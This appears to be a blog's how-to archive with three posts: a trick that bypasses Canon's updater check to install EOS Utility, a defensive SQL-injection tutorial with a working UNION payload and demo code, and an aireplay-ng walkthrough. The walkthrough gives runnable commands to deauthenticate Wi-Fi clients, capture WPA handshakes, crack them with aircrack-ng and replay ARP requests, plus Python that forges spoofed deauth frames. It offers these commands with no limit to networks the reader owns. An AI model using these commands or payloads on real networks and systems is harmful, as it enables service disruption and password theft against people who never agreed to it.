Archive for the 'How To' Category

Cracking Canon’s EOS Utility for Mac

Wednesday, November 4th, 2009

Today I had a small product photo-shoot and lo and behold, I forgot my CF card.

Canon ships a program called EOS Utility (together with Digital Photo Professional) that lets you fire the camera from the computer and save the shots straight to disk. Every Canon camera comes with a CD full of useful software like this, but like any true techie I threw away the manufacturer's disks.

For some reason Canon refuses to give this software away online. Even though it only works with their cameras and every camera comes with a copy, they won't let you download it! Some bigwig CEO must have freaked out when hearing “free” and “online” in the same sentence.

What's worse, this software is not on any torrent sites or Rapidshare either.

Well, fortunately for me, there was a workaround.

For Mac:

  1. Download the latest “Updater” for your program from Canon's support site.
    1. Choose EOS > Digital EOS Camera > Your Model
    2. Navigate to “Drivers and Downloads”
    3. Choose OS X under the “Driver / Software” section
  2. Mount the .dmg image file.
  3. In the image you should see a file called “UpdateInstaller”. Drag that to your desktop.
  4. Control-click the “UpdateInstaller” on your desktop and choose “Show Package Contents” from the menu.
  5. In the new window go to Contents > Resources
  6. Delete updated.plist (update: it may be called update.plist now). This is the file the updater uses to check for a previously installed version.
  7. Run the software.
  8. Enjoy!

Canon, mind getting your act together? It's not like some Nikon user is going to take advantage of the free software you paid good money to develop. You are a leader in digital photography, so step up to the digital age and distribute the software freely in both physical and digital form.

Protect your script from SQL String Injections

Friday, October 23rd, 2009

What is an SQL Injection?

An SQL injection is an attack in which user-supplied input is interpreted as part of an SQL query, letting the attacker manipulate the database behind a website. It may read data you don't want shared (such as a password) or simply rewrite it in the database.

This tutorial explains how an SQL injection works and how to avoid this type of attack.

String Injections

Let's imagine a piece of PHP that retrieves the age of a member on your forum. It reads the age from the query string with $_GET and uses it in a query on another page.

The code may look like this:

$age = $_GET['age'];  // untrusted input, straight from the URL
$requete = mysql_query("SELECT age FROM members WHERE age = '$age'");  // pasted verbatim into the SQL text

This is a nasty piece of code. Whatever is in the age parameter is pasted verbatim into the SQL text, so instead of supplying an age one can supply a closing quote followed by more SQL and, for example, read the password of that user instead of the age.

String Injections Protection

It's not that difficult to protect yourself from this attack. All it takes is switching out a little code.

Instead of using $_GET['age'] directly, pass it through mysql_real_escape_string(), which backslash-escapes the quote characters an attacker needs to break out of the string. The code from above becomes:

$age = mysql_real_escape_string($_GET['age']);  // escapes quotes and backslashes in the input
$requete = mysql_query("SELECT age FROM members WHERE age = '$age'");  // value must stay inside the quotes

Your PHP is now protected against this particular attack, but only under two conditions: the escaped value must sit inside quotes in the query (mysql_real_escape_string() does nothing for an unquoted value such as WHERE age = $age, where the input 0 OR 1=1 still rewrites the query), and the connection character set must be the one the escaping function assumes. The more robust fix, and the only one available since the mysql_* functions were removed in PHP 7, is a prepared statement (PDO or mysqli): the value is sent separately from the SQL text, so it can never change the structure of the query.
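To show the attack and the fix end to end, here is an added example that is not from the original post. It uses Python's built-in sqlite3 module instead of PHP/MySQL so it runs stand-alone against a constructed in-memory members table (the columns name, age and password are assumed; the post only mentions age and password). It reproduces the vulnerable lookup, the escaped lookup, the escaped-but-unquoted lookup that escaping does not save, and the parameterised query.

```python
import sqlite3

# Constructed sample data standing in for the forum's members table.
MEMBERS = [("alice", 30, "s3cret"), ("bob", 25, "hunter2")]

# Attacker-controlled value for the age parameter: closes the string and
# appends a UNION that pulls alice's password into the result set.
PAYLOAD = "x' UNION SELECT password FROM members WHERE name = 'alice"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (name TEXT, age INTEGER, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return conn


def vulnerable_lookup(conn, age):
    # Mirrors the first PHP snippet: the raw parameter is pasted into the query.
    query = f"SELECT age FROM members WHERE age = '{age}'"
    return conn.execute(query).fetchall()


def escape(value):
    # SQLite's analogue of mysql_real_escape_string for the quote character:
    # a literal ' inside a string literal is written as ''.
    return value.replace("'", "''")


def escaped_lookup(conn, age):
    # Mirrors the second PHP snippet: escape, then interpolate inside quotes.
    query = f"SELECT age FROM members WHERE age = '{escape(age)}'"
    return conn.execute(query).fetchall()


def escaped_unquoted_lookup(conn, age):
    # The caveat: escaping quotes does nothing when the value is not quoted,
    # so "0 OR 1=1" still rewrites the WHERE clause.
    query = f"SELECT age FROM members WHERE age = {escape(age)}"
    return conn.execute(query).fetchall()


def safe_lookup(conn, age):
    # Parameterised query: the driver binds the value separately from the SQL
    # text, so no input can change the structure of the statement.
    return conn.execute("SELECT age FROM members WHERE age = ?", (age,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", vulnerable_lookup(conn, PAYLOAD))
    print("escaped:", escaped_lookup(conn, PAYLOAD))
    print("escaped, unquoted:", escaped_unquoted_lookup(conn, "0 OR 1=1"))
    print("parameterised:", safe_lookup(conn, PAYLOAD))
```

The vulnerable lookup returns alice's password for the payload, the escaped lookup returns nothing, the unquoted variant returns every row for the input 0 OR 1=1 despite the escaping, and the parameterised query returns nothing for any payload.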

Deauthentication Using Aireplay-ng

Sunday, June 21st, 2009

This attack sends deauthentication (disassociate) frames to one or more clients which are currently associated with a particular access point. Forcing clients off the network is useful for a number of reasons:

  1. Recovering a hidden ESSID. This is an ESSID which is not being broadcast.
  2. Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
  3. Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

Of course, this attack is useless if there are no associated wireless clients, and it does nothing against fake authentications.

Usage

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication

1 is the number of deauth bursts to send (you can send multiple if you wish); 0 means send them continuously

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated

ath0 is the interface name
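What aireplay-ng -0 actually puts on the air is a pair of spoofed 802.11 management frames per burst: one addressed to the client with the access point as source, one addressed to the access point with the client as source. The following is an added example, not part of the original post or of aircrack-ng, that builds and decodes such frames in Python so the layout can be inspected offline; the MAC addresses are the ones from the command above, and reason code 7 is assumed because it is the code current aireplay-ng reports in its output.

```python
import struct

# Frame-control byte 0 for 802.11 management frames: protocol version 0, type 0
# (management), subtype 12 (deauthentication) = 0xC0; subtype 10 (disassociation) = 0xA0.
FC_DEAUTH = 0xC0
FC_DISASSOC = 0xA0
BROADCAST = "FF:FF:FF:FF:FF:FF"
# Reason code 7: "class 3 frame received from nonassociated station" (assumed,
# matching the "(code 7)" current aireplay-ng prints).
REASON_CLASS3_NONASSOC = 7


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)


def build_mgmt_frame(fc0, receiver, transmitter, bssid, reason, seq=0):
    """Build a deauth/disassoc frame: 24-byte MAC header plus a 2-byte reason code.

    The FCS and any radiotap header are left to the driver; this is the payload
    a raw 802.11 injection socket would be handed.
    """
    header = struct.pack("<BBH", fc0, 0x00, 0)        # frame control, flags, duration
    header += mac_bytes(receiver)                      # addr1: destination
    header += mac_bytes(transmitter)                   # addr2: (spoofed) source
    header += mac_bytes(bssid)                         # addr3: BSSID
    header += struct.pack("<H", (seq & 0x0FFF) << 4)   # sequence control, fragment 0
    return header + struct.pack("<H", reason)          # body: reason code, little-endian


def deauth_pair(ap, client=BROADCAST, reason=REASON_CLASS3_NONASSOC):
    """Frames equivalent to one 'aireplay-ng -0 1 -a AP [-c CLIENT]' burst.

    Frame 1 goes to the client pretending to come from the AP; frame 2 goes to
    the AP pretending to come from the client. Without -c the tool uses the
    broadcast address, which only makes sense AP-to-clients, so one frame.
    """
    frames = [build_mgmt_frame(FC_DEAUTH, client, ap, ap, reason)]
    if client.upper() != BROADCAST:
        frames.append(build_mgmt_frame(FC_DEAUTH, ap, client, ap, reason))
    return frames


def parse_mgmt_frame(frame):
    """Decode a deauth/disassoc frame into its fields; None for anything else."""
    if len(frame) < 26:
        return None
    fc0, _flags, _duration = struct.unpack_from("<BBH", frame, 0)
    kinds = {FC_DEAUTH: "deauth", FC_DISASSOC: "disassoc"}
    if fc0 not in kinds:
        return None
    (seq_ctrl,) = struct.unpack_from("<H", frame, 22)
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {
        "kind": kinds[fc0],
        "da": mac_str(frame[4:10]),
        "sa": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "seq": seq_ctrl >> 4,
        "reason": reason,
    }


if __name__ == "__main__":
    for f in deauth_pair("00:14:6C:7E:40:80", "00:0F:B5:34:30:30"):
        print(f.hex(), parse_mgmt_frame(f))
```

Nothing in the frame authenticates the source address, which is why any station can forge it; a client or access point using 802.11w (Protected Management Frames) drops unprotected deauthentication frames, and a burst of deauth frames with a repeated reason code is the classic wireless IDS signature for this attack.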

Usage Examples

Typical Deauthentication

First, determine a client which is currently connected (airodump-ng lists associated stations under its BSSID). You need its MAC address for the following command:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

The options are the same as in the Usage section above: -0 selects deauthentication, 1 is the number of deauth bursts to send, -a is the MAC address of the access point, -c is the MAC address of the client you are deauthing and ath0 is the interface name.

Here is what the output looks like:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

WPA/WPA2 Handshake capture with an Atheros card

airmon-ng start ath0

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0

(switch to another console)

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

(wait for a few seconds)

aircrack-ng -w /path/to/dictionary out.cap

(airodump-ng numbers its capture files, so the file on disk will be out-01.cap for the first run; aircrack-ng reports whether a handshake was captured before it starts the dictionary attack)

Here is the explanation of the above commands:

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0

Where:

-c 6 is the channel to listen on

--bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point

-w out is the file prefix of the file name to be written

ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Where:

-0 means deauthentication attack

5 is the number of deauthentication bursts to send out; each burst is sent in both directions, to the client and to the access point (64 frames each way in current versions)

-a 00:14:6C:7E:40:80 is MAC address of the access point

-c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated

ath0 is the interface name

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”:

12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0

airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0

(switch to another console)

aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten bursts of deauthentication packets, we start listening for ARP requests with attack 3 (ARP request replay): the deauthenticated client reconnects and typically re-sends ARP requests, which aireplay-ng captures and replays. The -h option is mandatory and must be the MAC address of an associated client, since the access point only accepts replayed frames from a station it knows.